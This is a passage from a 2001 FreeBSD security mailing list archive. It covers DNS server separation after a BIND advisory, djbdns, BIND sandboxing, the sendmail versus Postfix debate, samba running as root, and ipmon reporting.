which in turn can glitch every single host trying to use that server for lookups. This is why you separate functions... DNS servers handing out primary and secondary zones can afford to go offline for minutes, even hours without glitching anyone, as long as there is at least one other NS for the zone(s). Servers handling recursive lookups for hosts can't afford to go offline for even an instant, because the hosts using those servers often take several seconds ON EACH LOOKUP to fall back to a secondary recursive server. If you think specifying multiple recursive servers in /etc/resolv.conf will save a heavily loaded host, like a mail box, you will be in for one hellofa surprise when your primary resolver goes down! Since you typically never have to reload or restart a recursive nameserver that is not primary or secondary for any zones, and since you typically always have to reload or restart a primary zone server (whenever you make a change to a zone)... Well, it should be obvious. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 2: 2:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from rapier.smartspace.co.za (rapier.smartspace.co.za [66.8.25.34]) by hub.freebsd.org (Postfix) with SMTP id 1C13737B65D for ; Thu, 1 Feb 2001 02:02:32 -0800 (PST) Received: (qmail 11820 invoked by uid 1001); 1 Feb 2001 10:02:19 -0000 Date: Thu, 1 Feb 2001 12:02:19 +0200 From: Neil Blakey-Milner To: Matt Dillon Cc: Chris Johnson , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010201120218.A10087@rapier.smartspace.co.za> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200102010154.f111sYE23275@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 05:54:34PM -0800 Organization: Building Intelligence X-Operating-System: FreeBSD 4.2-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed 2001-01-31 (17:54), Matt Dillon wrote: > > :Yes! Why work around BIND limitiations and do all this sandboxing to try to > :limit the damage it can do to you, when there's a better alternative? > : > :Chris > > Yah, that's the ticket... kinda like wu-ftpd was created because existing > ftpd's weren't up to snuff, except wu-ftpd turned out to have literally > dozens of rootable exploits. > > Just because BIND's loopholes are advertised doesn't mean that other > DNS servers don't have loopholes. While I agree that some of the newer > ones almost certainly have *fewer* rootable loopholes, maybe, I don't > see them as improving my risk factors much. It might be an idea to actually research djbdns, consider its design, history, and coding standards, and then make a judgement. Neil (aka djbdns port maintainer (with lots of help from roam)) -- Neil Blakey-Milner nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 2:22:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C8C3637B684 for ; Thu, 1 Feb 2001 02:22:31 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA29864; Thu, 1 Feb 2001 11:22:26 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Alfred Perlstein Cc: Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> From: Dag-Erling Smorgrav Date: 01 Feb 2001 11:22:26 +0100 In-Reply-To: Alfred Perlstein's message of "Wed, 31 Jan 2001 14:54:23 -0800" Message-ID: Lines: 14 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alfred Perlstein writes: > What I'm worrying about specifically is ndc and other utilities > basically are unix domain sockets not in the expected place all of > sudden? Does anybody read this list, or do you all just post to it without reading anything anyone else is posting? I posted detailed instructions for a) upgrading a vulnerable system without making world, and b) setting up BIND in chroot and jail sandboxes, including how to deal with ndc and log sockets, just a few days ago. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 3:32:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (s216-232-31-82.bc.hsia.telus.net [216.232.31.82]) by hub.freebsd.org (Postfix) with ESMTP id D1B6C37B491; Thu, 1 Feb 2001 03:32:15 -0800 (PST) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id 911111DC03; Thu, 1 Feb 2001 03:37:24 -0800 (PST) From: Dragos Ruiu Organization: kyx.net To: Christopher Farley , Fenix Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 03:22:20 -0800 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com> In-Reply-To: <20010131235613.A7019@northernbrewer.com> MIME-Version: 1.0 Message-Id: <01020103331409.27656@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Christopher Farley wrote: > Fenix (fenix@xs4some.net) wrote: > > > I have a little question about sendmail vs. postfix .... > > Are there any known recent problms with sendmail security ? > > what about postfix ? > > Sendmail is a large, monolithic, complicated program that runs as > root. Historically, it has been responsible for some of the most > notorious and widespread security holes on the Internet, but I > don't believe there are any (known) gaping holes in it today. > Sendmail configuration is complicated and arcane -- it is the > subject of one of the thickest books in the O'Reilly catalog. > Actually, configuring sendmail is not that bad once you understand > it -- you edit a human-readable config file which is processed by > the m4 macro processor to build the much less human-readable > sendmail.cf file. However, if you are like I am, and infrequently > make configuration changes to your mail server, it may take more than a > few minutes of grepping documentation to make even a tiny change. > > Postfix has a different architecture, but strictly conforms to the > 'sendmail api'. That is to say that Postfix is more or less designed > to be a drop-in replacement for Sendmail. Postfix is actually > several small, specialized daemons that do not run as root (!), > which has some positive security implications. Configuration of > Postfix is very easy; there is no m4 macro processing here! I have > always been able to make it do what I need it to do, although my > needs aren't very great. According to my ISP (visi.com), Postfix > outperforms Sendmail. > Postfix performance exceeds sendmail performance on equivalent boxes in all my experiences in terms of just about any metric you care to use, and I use it exclusively these days. As anecdotal evidence, once when I configured it on a very fast machine and sent a lot of mail through it, I had a large ISP call up and complain that I was DoSing their mail server.... It was just postfix being its normal, speedy, efficient self, and they had some NT lameware mail relay.... As far as security, given how much I rely on it, I recently(last year) decided to re-audit its code, and after a couple of days spent looking for format strings and other stuff I decided to discontinue the audit... Mr. Venema's code is so rigorous that it even passes _internal_ data between routines through filtering and cleaning functions (how paranoid is that :-) if that's any indication of how it's built up. I personally think very highly of it. (Besides, I really would be fine if I never have to look at another arcane sendmail ruleset ever again... :-P ) cheers, --dr -- Dragos Ruiu dursec.com ltd. / kyx.net - we're from the future gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc http://cansecwest.com CanSecWest/core01: March 28-30, Vancouver B.C. ------------^ Speakers: Renaud Deraison/Nessus Attack Scanner, Martin Roesch/Snort/Advanced IDS, Ron Gula/Enterasys/Strategic IDS, Dug Song/Arbor Networks/Monkey in the Middle, RFP/Whisker2.0 and other fun, Mixter/2XS/Distributed Apps, Theo DeRaadt/OpenBSD, K2/w00w00/ADMutate, HD Moore/Digital Defense/Making NT Bleed, Frank Heidt/@Stake, Matthew Franz/Cisco/Trinux/Security Models, Fyodor/insecure.org/Packet Reconaissance, Lance Spitzner/Sun/Honeynet Fun, Robert Graham/NetworkICE/IDS Technology Demo, Kurt Seifried/SecurityPortal/Crypto: 2-Edged Sword, Dave Dittrich/UW/Forensics, Sebastien Lacoste-Seris & Nicolas Fischbach/COLT Telecom/Securite.Org/Kerberized SSH Deployment, Jay Beale/MandrakeSoft/Bastille-Linux/Securing Linux To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 6:45:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from iaces.com (horton.iaces.com [204.147.87.98]) by hub.freebsd.org (Postfix) with ESMTP id 8536937B491 for ; Thu, 1 Feb 2001 06:45:20 -0800 (PST) Received: (from proot@localhost) by iaces.com (8.11.1/8.11.1) id f11EjHL11174 for security@freebsd.org; Thu, 1 Feb 2001 08:45:17 -0600 (CST) (envelope-from proot) Date: Thu, 1 Feb 2001 08:45:17 -0600 From: "Paul T. Root" To: security@freebsd.org Subject: Re: sendmail vs. postfix question Message-ID: <20010201084517.A11129@horton.iaces.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i X-Organization: Qwest - ACES X-Phone: (612) 664-3385 X-Fax: (612) 664-4779 X-Page: (877) 693-7155 X-Address: Minneapolis, MN 55413 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I took the advanced Sendmail course from Allman back that the '99 LISA. At that time he said there had been no security holes found in sendmail in a few years (I don't remember the actual number), and in those 2 years, I don't remember any. I also run Sendmail Switch (the for sale version) on my main domain, and it installs running without root. > > Date: Thu, 1 Feb 2001 01:15:22 -0500 > From: "Richard Ward" > Subject: Re: sendmail vs. postfix question > > That's very true. One of the features that stand out in the "Sendmail = > verses Postfix" war is that Postfix doesn't "need" root. With some = > modification, neither does Sendmail. Though many won't take the time to = > do this, it's one of the reasons Sendmail is deemed one of the most = > insecure "common" daemons. I prefer Sendmail over Postfix simply because = > I was brought up on to the Internet running Sendmail, it feels more like = > home. I do however have Postfix running on my local machine, and with = > keeping up-to-date on mailing lists such as this, none are a huge threat = > to my network. > > I would have to agree, doing anything in Sendmail takes some reading, = > though for the basic e-mail setup, there's little need to bring out = > O'Reilly. Both Sendmail and Postfix have a home on my network, I suppose = > it's just how much time you want to put in to it that depicts which MTA = > you will be running on your next computer. > > Just my two cents. > - -- > Richard Ward, CEO > richard@neonsky.net > Neonsky Internet Services > 877 249 6707 - US/Canada > > > - ----- Original Message -----=20 > From: Christopher Farley > To: Fenix > Cc: ; > Sent: Thursday, February 01, 2001 12:56 AM > Subject: Re: sendmail vs. postfix question > > > > Fenix (fenix@xs4some.net) wrote: > >=20 > > > I have a little question about sendmail vs. postfix .... > > > Are there any known recent problms with sendmail security ? > > > what about postfix ? > >=20 > > Sendmail is a large, monolithic, complicated program that runs as > > root. Historically, it has been responsible for some of the most > > notorious and widespread security holes on the Internet, but I > > don't believe there are any (known) gaping holes in it today. > > Sendmail configuration is complicated and arcane -- it is the > > subject of one of the thickest books in the O'Reilly catalog. > > Actually, configuring sendmail is not that bad once you understand > > it -- you edit a human-readable config file which is processed by > > the m4 macro processor to build the much less human-readable > > sendmail.cf file. However, if you are like I am, and infrequently > > make configuration changes to your mail server, it may take more than = > a > > few minutes of grepping documentation to make even a tiny change. > >=20 > > Postfix has a different architecture, but strictly conforms to the > > 'sendmail api'. That is to say that Postfix is more or less designed > > to be a drop-in replacement for Sendmail. Postfix is actually > > several small, specialized daemons that do not run as root (!), > > which has some positive security implications. Configuration of > > Postfix is very easy; there is no m4 macro processing here! I have > > always been able to make it do what I need it to do, although my > > needs aren't very great. According to my ISP (visi.com), Postfix > > outperforms Sendmail.=20 > >=20 > > --=20 > > Christopher Farley > > www.northernbrewer.com > >=20 > >=20 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > -- Shaquille O'Neal, on his lack of championships: "I've won at every level, except college and pro." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 6:46:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id C64A137B6BD for ; Thu, 1 Feb 2001 06:46:05 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f11Eknc76372 for ; Thu, 1 Feb 2001 09:46:50 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Thu, 1 Feb 2001 09:46:49 -0500 (EST) From: Rob Simmons To: security@freebsd.org Subject: samba Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just noticed that each of the smbd processes on my samba/freebsd 4.2-stable box are running as root. On an older debian machine, each of the smbd processes ran as the user that was connected. Is this a difference due to something in freebsd? Or is it a difference between version 2.0.6 and 2.0.7 of samba? Robert Simmons Systems Administrator http://www.wlcg.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7: 6:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from inetworx.pcgameauthority.com (154.160.20.216.fastpoint.net [216.20.160.154]) by hub.freebsd.org (Postfix) with ESMTP id 3BAB337B491; Thu, 1 Feb 2001 07:06:22 -0800 (PST) Received: from maximus (maximus.pcgameauthority.com [192.168.10.4]) by inetworx.pcgameauthority.com (Postfix) with SMTP id 23CD49501; Thu, 1 Feb 2001 07:07:59 -0800 (PST) Message-ID: <001c01c08c60$a49ee640$040aa8c0@pcgameauthority.com> Reply-To: "Andre Hall" From: "Andre Hall" To: "Dragos Ruiu" , "Christopher Farley" , "Fenix" Cc: , References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com> <01020103331409.27656@smp.kyx.net> Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 07:07:07 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I once was faced with the same dilemma as you were. I finally decide to the Postfix way have not regretted my decision one bit. It was the easiest and fastest configuration I had experienced, a definite plus over Sendmail. From my first experience with Sendmail I always been displeased with how arcaic it is, especially if you need to make changes. Postfix's configuration file is very user-friendly- you don't have to be a rocket scientist to make changes. Straight and to the point. You can also find an abundance of support on the author's site. It's really based on personal preference. I hope my two cents helps you ----- Original Message ----- From: "Dragos Ruiu" To: "Christopher Farley" ; "Fenix" Cc: ; Sent: Thursday, February 01, 2001 3:22 AM Subject: Re: sendmail vs. postfix question > On Wed, 31 Jan 2001, Christopher Farley wrote: > > Fenix (fenix@xs4some.net) wrote: > > > > > I have a little question about sendmail vs. postfix .... > > > Are there any known recent problms with sendmail security ? > > > what about postfix ? > > > > Sendmail is a large, monolithic, complicated program that runs as > > root. Historically, it has been responsible for some of the most > > notorious and widespread security holes on the Internet, but I > > don't believe there are any (known) gaping holes in it today. > > Sendmail configuration is complicated and arcane -- it is the > > subject of one of the thickest books in the O'Reilly catalog. > > Actually, configuring sendmail is not that bad once you understand > > it -- you edit a human-readable config file which is processed by > > the m4 macro processor to build the much less human-readable > > sendmail.cf file. However, if you are like I am, and infrequently > > make configuration changes to your mail server, it may take more than a > > few minutes of grepping documentation to make even a tiny change. > > > > Postfix has a different architecture, but strictly conforms to the > > 'sendmail api'. That is to say that Postfix is more or less designed > > to be a drop-in replacement for Sendmail. Postfix is actually > > several small, specialized daemons that do not run as root (!), > > which has some positive security implications. Configuration of > > Postfix is very easy; there is no m4 macro processing here! I have > > always been able to make it do what I need it to do, although my > > needs aren't very great. According to my ISP (visi.com), Postfix > > outperforms Sendmail. > > > > Postfix performance exceeds sendmail performance on equivalent boxes in all my > experiences in terms of just about any metric you care to use, and I use it > exclusively these days. As anecdotal evidence, once when I configured it on a > very fast machine and sent a lot of mail through it, I had a large ISP call up > and complain that I was DoSing their mail server.... It was just postfix being > its normal, speedy, efficient self, and they had some NT lameware mail relay.... > > As far as security, given how much I rely on it, I recently(last year) decided > to re-audit its code, and after a couple of days spent looking for format > strings and other stuff I decided to discontinue the audit... Mr. Venema's code > is so rigorous that it even passes _internal_ data between routines through > filtering and cleaning functions (how paranoid is that :-) if that's any > indication of how it's built up. > > I personally think very highly of it. (Besides, I really would be fine > if I never have to look at another arcane sendmail ruleset ever > again... :-P ) > > cheers, > --dr > > -- > Dragos Ruiu dursec.com ltd. / kyx.net - we're from the future > gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc > http://cansecwest.com > CanSecWest/core01: March 28-30, Vancouver B.C. ------------^ > Speakers: Renaud Deraison/Nessus Attack Scanner, Martin Roesch/Snort/Advanced IDS, > Ron Gula/Enterasys/Strategic IDS, Dug Song/Arbor Networks/Monkey in the Middle, > RFP/Whisker2.0 and other fun, Mixter/2XS/Distributed Apps, Theo DeRaadt/OpenBSD, > K2/w00w00/ADMutate, HD Moore/Digital Defense/Making NT Bleed, Frank Heidt/@Stake, > Matthew Franz/Cisco/Trinux/Security Models, Fyodor/insecure.org/Packet Reconaissance, > Lance Spitzner/Sun/Honeynet Fun, Robert Graham/NetworkICE/IDS Technology Demo, > Kurt Seifried/SecurityPortal/Crypto: 2-Edged Sword, Dave Dittrich/UW/Forensics, > Sebastien Lacoste-Seris & Nicolas Fischbach/COLT Telecom/Securite.Org/Kerberized > SSH Deployment, Jay Beale/MandrakeSoft/Bastille-Linux/Securing Linux > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7: 9:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 3584C37B491 for ; Thu, 1 Feb 2001 07:09:23 -0800 (PST) Received: (qmail 38344 invoked by uid 1001); 1 Feb 2001 15:09:21 +0000 (GMT) To: dillon@earth.backplane.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind From: sthaug@nethelp.no In-Reply-To: Your message of "Wed, 31 Jan 2001 17:50:48 -0800 (PST)" References: <200102010150.f111omZ23184@earth.backplane.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 01 Feb 2001 16:09:21 +0100 Message-ID: <38342.981040161@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Umm... respectfully, you are not configuring your system correctly > if the down time affects you. > > This is what we did at BEST: ... > * Three machines running named, non-recursive, ONLY used to serve > primary and secondary zones. At least 20,000 zones, dup'd to each > box. > > We updated the primary DNS boxes four times a day. We updated the boxes > one at a time, so at any given moment only one was 'down'. > > The DNS protocols handle the rest. It's perfectly acceptable for a > primary NS to be down as long as other primary NS's are up. And that's where we like to keep the servers running - even if they are running non-recursive, and (of course!) there are several servers for each zone. Thus we prefer ndc reconfig/reload (and HUP before that was available). Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:12:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from post.mail.nl.demon.net (post-10.mail.nl.demon.net [194.159.73.20]) by hub.freebsd.org (Postfix) with ESMTP id 9BEFE37B491; Thu, 1 Feb 2001 07:12:08 -0800 (PST) Received: from [195.11.243.26] (helo=Debug) by post.mail.nl.demon.net with smtp (Exim 3.14 #2) id 14OLP2-0005FC-00; Thu, 01 Feb 2001 15:12:04 +0000 To: "Andre Hall" , "Dragos Ruiu" , "Christopher Farley" , "Fenix" , , From: Cliff Sarginson Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 15:12:04 GMT X-Mailer: www.webmail.nl.demon.net X-Sender: postmaster@btvs.demon.nl X-Originating-IP: 192.250.25.251 Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I want to endorse the comments below. The author of Postfix has produced a realy solid, fast and secure mail system. You may be interested to know he also authored tcp-wrappers and the (in)famous satan program. He also personally answers many of the questions on the postfix-users@postfix.org mailling list. browse the archives on deja if you are curious.. Cliff > I once was faced with the same dilemma as you were. I finally decide to the > Postfix way have not regretted my decision one bit. It was the easiest and > fastest configuration I had experienced, a definite plus over Sendmail. From > my first experience with Sendmail I always been displeased with how arcaic > it is, especially if you need to make changes. Postfix's configuration file > is very user-friendly- you don't have to be a rocket scientist to make > changes. Straight and to the point. You can also find an abundance of > support on the author's site. It's really based on personal preference. > I hope my two cents helps you > > ----- Original Message ----- > From: "Dragos Ruiu" > To: "Christopher Farley" ; "Fenix" > > Cc: ; > Sent: Thursday, February 01, 2001 3:22 AM > Subject: Re: sendmail vs. postfix question > > > > On Wed, 31 Jan 2001, Christopher Farley wrote: > > > Fenix (fenix@xs4some.net) wrote: > > > > > > > I have a little question about sendmail vs. postfix .... > > > > Are there any known recent problms with sendmail security ? > > > > what about postfix ? > > > > > > Sendmail is a large, monolithic, complicated program that runs as > > > root. Historically, it has been responsible for some of the most > > > notorious and widespread security holes on the Internet, but I > > > don't believe there are any (known) gaping holes in it today. > > > Sendmail configuration is complicated and arcane -- it is the > > > subject of one of the thickest books in the O'Reilly catalog. > > > Actually, configuring sendmail is not that bad once you understand > > > it -- you edit a human-readable config file which is processed by > > > the m4 macro processor to build the much less human-readable > > > sendmail.cf file. However, if you are like I am, and infrequently > > > make configuration changes to your mail server, it may take more than a > > > few minutes of grepping documentation to make even a tiny change. > > > > > > Postfix has a different architecture, but strictly conforms to the > > > 'sendmail api'. That is to say that Postfix is more or less designed > > > to be a drop-in replacement for Sendmail. Postfix is actually > > > several small, specialized daemons that do not run as root (!), > > > which has some positive security implications. Configuration of > > > Postfix is very easy; there is no m4 macro processing here! I have > > > always been able to make it do what I need it to do, although my > > > needs aren't very great. According to my ISP (visi.com), Postfix > > > outperforms Sendmail. > > > > > > > Postfix performance exceeds sendmail performance on equivalent boxes in > all my > > experiences in terms of just about any metric you care to use, and I use > it > > exclusively these days. As anecdotal evidence, once when I configured it > on a > > very fast machine and sent a lot of mail through it, I had a large ISP > call up > > and complain that I was DoSing their mail server.... It was just postfix > being > > its normal, speedy, efficient self, and they had some NT lameware mail > relay.... > > > > As far as security, given how much I rely on it, I recently(last year) > decided > > to re-audit its code, and after a couple of days spent looking for format > > strings and other stuff I decided to discontinue the audit... Mr. Venema's > code > > is so rigorous that it even passes _internal_ data between routines > through > > filtering and cleaning functions (how paranoid is that :-) if that's any > > indication of how it's built up. > > > > I personally think very highly of it. (Besides, I really would be fine > > if I never have to look at another arcane sendmail ruleset ever > > again... :-P ) > > > > cheers, > > --dr > > > > -- > > Dragos Ruiu dursec.com ltd. / kyx.net - we're from the > future > > gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc > > > http://cansecwest.com > > CanSecWest/core01: March 28-30, Vancouver B.C. ------------^ > > Speakers: Renaud Deraison/Nessus Attack Scanner, Martin > Roesch/Snort/Advanced IDS, > > Ron Gula/Enterasys/Strategic IDS, Dug Song/Arbor Networks/Monkey in the > Middle, > > RFP/Whisker2.0 and other fun, Mixter/2XS/Distributed Apps, Theo > DeRaadt/OpenBSD, > > K2/w00w00/ADMutate, HD Moore/Digital Defense/Making NT Bleed, Frank > Heidt/@Stake, > > Matthew Franz/Cisco/Trinux/Security Models, Fyodor/insecure.org/Packet > Reconaissance, > > Lance Spitzner/Sun/Honeynet Fun, Robert Graham/NetworkICE/IDS Technology > Demo, > > Kurt Seifried/SecurityPortal/Crypto: 2-Edged Sword, Dave > Dittrich/UW/Forensics, > > Sebastien Lacoste-Seris & Nicolas Fischbach/COLT > Telecom/Securite.Org/Kerberized > > SSH Deployment, Jay Beale/MandrakeSoft/Bastille-Linux/Securing Linux > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:33:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from test.kens.com (kens.com [129.250.30.40]) by hub.freebsd.org (Postfix) with ESMTP id 6A78337B684 for ; Thu, 1 Feb 2001 07:33:31 -0800 (PST) Received: (qmail 4067 invoked by uid 1002); 1 Feb 2001 15:33:31 -0000 Date: Thu, 1 Feb 2001 10:33:31 -0500 From: "Robin S. Socha" To: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: sendmail vs. postfix question Message-ID: <20010201103331.L53804@kens.com> Reply-To: freebsd-questions@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline User-Agent: Mutt/1.3.14i In-Reply-To: ; from cliff@raggedclown.net on Thu, Feb 01, 2001 at 03:12:04PM +0000 X-Mailer: Mutt http://www.mutt.org/ X-URL: https://socha.net/ X-Editor: Vim-600 http://www.vim.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Cliff Sarginson [010201 10:13]: >> I once was faced with the same dilemma as you were. I finally decide >> to the Postfix way have not regretted my decision one bit. It was >> the easiest and fastest configuration I had experienced, a definite >> plus over Sendmail. Null argument, since the same applies to every other MTA, particularly qmail. > I want to endorse the comments below. No. You want to endorse this and fix your quoting. And while we're at it, don't think for a minute about Cc:ing me: http://learn.to/edit_messages > The author of Postfix has produced a realy solid, fast and > secure mail system. You may be interested to know he also > authored tcp-wrappers and the (in)famous satan program. > He also personally answers many of the questions on the > postfix-users@postfix.org mailling list. Wietse Venema is also extremely nice and friendly. /Un/fortunately, that has not much to do with security ;-) Anyway, postfix and qmail are indeed the MTAs of choice if you're looking for secure and fast ones. If you intend to run mailing lists, qmail's ezmlm is, however, /the/ #1 choice. Reply-to set. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:40:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id EDD8F37B503 for ; Thu, 1 Feb 2001 07:40:40 -0800 (PST) Received: from HP2500B (veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 282988C2C for ; Thu, 1 Feb 2001 09:40:13 -0600 (CST) Message-ID: <008c01c08c64$e07a3ee0$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: Subject: ipmon and periodic Date: Thu, 1 Feb 2001 09:37:23 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anybody written a script or modified the current nightly periodic scripts to send ipmon output in the security email as is currently done for ipfw? I have switched to ipfilter and I would like to see my daily ipmon output - or at least the relavent stats. I would hate to replicate the work if it has already been done :) Tom Veldhouse veldy@veldy.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:52:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1178B37B503 for ; Thu, 1 Feb 2001 07:52:08 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA76230; Thu, 1 Feb 2001 10:51:36 -0500 (EST) (envelope-from wollman) Date: Thu, 1 Feb 2001 10:51:36 -0500 (EST) From: Garrett Wollman Message-Id: <200102011551.KAA76230@khavrinen.lcs.mit.edu> To: Neil Blakey-Milner Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010201120218.A10087@rapier.smartspace.co.za> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com> <20010201120218.A10087@rapier.smartspace.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > It might be an idea to actually research djbdns, consider its design, > history, and coding standards, and then make a judgement. While you're doing that, also consider the guy who wrote it, and whether your view of the universe coincides with his. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:54:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu 